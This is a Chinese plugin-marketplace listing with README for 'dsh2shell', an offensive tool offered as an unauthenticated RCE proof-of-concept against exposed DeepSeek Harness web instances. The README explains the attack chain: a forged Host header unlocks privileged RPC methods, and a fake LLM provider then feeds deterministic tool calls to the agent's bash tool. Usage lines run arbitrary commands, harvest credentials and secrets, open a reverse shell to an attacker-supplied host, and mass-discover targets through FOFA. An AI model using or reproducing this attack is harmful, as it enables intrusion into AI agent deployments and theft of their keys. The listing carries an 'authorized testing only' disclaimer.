← 返回列表
需源码安装
针对暴露的 DeepSeek Harness dsh Web 实例的未认证 RCE PoC。
暂不能直接安装(需源码编译或环境不满足):仓库缺少 package.json,无法用 dsh 插件安装命令安装。 · 最近上游提交 2026/8/22 · 已提供中文文档
针对暴露的 DeepSeek Harness (dsh) Web 实例的未认证 RCE PoC。
综合分
51.8
GitHub 分
51.8
用户评分
—
★ Stars
56
周下载量
—
安装插件(需先安装 dsh CLI 引擎:npm install -g @deepseek-ai/dsh)
dsh plugin --profile web add ChaoMixian/dsh2shell仓库缺少 package.json,无法用 dsh 插件安装命令安装,改用 GitHub 源安装
🟢实装验证通过· 2026/9/19
由 dsh-plugin-verify(GitHub Actions)在真实 dsh 环境安装成功,非静态推断。
数据截至 2026/9/17(元数据每日更新 · 实装验证按队列轮转,单条结论的验证时间见上方)
安装兼容性检查需源码安装
以下结论由程序自动检查 npm 包、engines 声明与入口文件得出,未做人工实机验证——能装不等于用着没问题。
✗npm 包dsh2shell(未发布到 npm,仅可源码安装)
✓Node 引擎未声明 engines.node
✓dsh CLI 依赖未声明 dsh 版本约束
✗入口文件缺少入口声明
仓库缺少 package.json,无法用 dsh 插件安装命令安装
验证方式:npm registry 存在性 + package.json 静态校验 · 最后验证 2026/9/17 21:21:18
用户评分
还没有人投票,来当第一个
订阅周报,不错过优质插件更新
每周一封 · 高评分插件 + 新用户活动
README
dsh2shell 针对暴露的 DeepSeek Harness (dsh) Web 实例的未认证 RCE PoC。 demo 原理:伪造 Host 头可解锁 dsh 的特权 RPC 方法,从而让 PoC 注册一个临时 LLM 提供方,指向其内置的伪造模型服务器,并以确定性的工具调用驱动 agent 的 bash 工具——无需真实模型或有效 API 密钥。 要求 - Python 3.8+(仅标准库) - 一个从目标可达的监听地址(例如你的 VPS 公网 IP) 用法 运行一条或多条命令: python3 dsh2shell.py -t https://target.example.com \ --public-base http://1.2.3.4:9999/v1 --cmd "id" --cmd "cat /flag" 搜寻凭据(环境变量、点文件、dsh 目录树、正则扫描;已知的密钥/secret 模式会被提取并高亮): python3 dsh2shell.py -t https://target.example.com \ --public-base http://1.2.3.4:9999/v1 --loot-keys 打开交互式 PTY: python3 dsh2shell.py -t https://target.example.com \ --public-base http://1.2.3.4:9999/v1 --shell \ --lhost 1.2.3.4 --raw FOFA 资产测绘与被动探测: export FOFA_KEY='' python3 dsh2shell.py --fofa 对单个目标进行只读探测(可达性、默认模型、权限预设、提供方路由、残留检查): python3 dsh2shell.py -t https://target.example.com --dry-run 修复被中断的运行所留下的残留(残留的提供方路由、虚假凭据、仍指向伪造提供方的默认模型;当没有用户路由残留时回退到内置的 deepseek-official 提供方): python3 dsh2shell.py -t https://target.example.com --repair 选项: | 选项 | 含义 | |---|---| | --fofa | FOFA 资产测绘与被动 dsh/API 探测 | | --dry-run | 仅探测:可达性、默认模型、预设、提供方路由;不做任何更改 | | --repair | 清除被中断运行留下的伪造 LLM 残留,并重新选择一个现有模型 | | --loot-keys | 广泛的凭据搜寻,带密钥/secret 提取(可单独使用或配合 --cmd) | | --shell | 针对一个明确目标打开反向 shell | | --cmd "CMD" | 非交互式运行一条命令(可重复) | | --no-cleanup | 保留攻击会话和配置更改 | | --no-log | 禁用运行日志 | | --log-dir dir | 带时间戳的运行日志目录(默认 dsh2shell_logs;除非 --no-log,否则始终开启) | | -t, --target URL | 明确的目标 URL | | --lhost address | 从目标可达的回连地址 | | --shell-port port | 反向 shell 端口(默认 4444) | | --llm-listen host:port | 伪造 LLM 绑定地址(默认 0.0.0.0:9999) | | --public-base URL | 从目标视角看到的伪造 LLM /v1 URL | | --secure | 验证 TLS 证书(默认:忽略 TLS 错误) | | --raw | 使用原始本地 TTY;Ctrl-] 关闭客户端 | FOFA 结果绝不会自动传入利用模式。 仅供授权安全测试使用。
扫码进群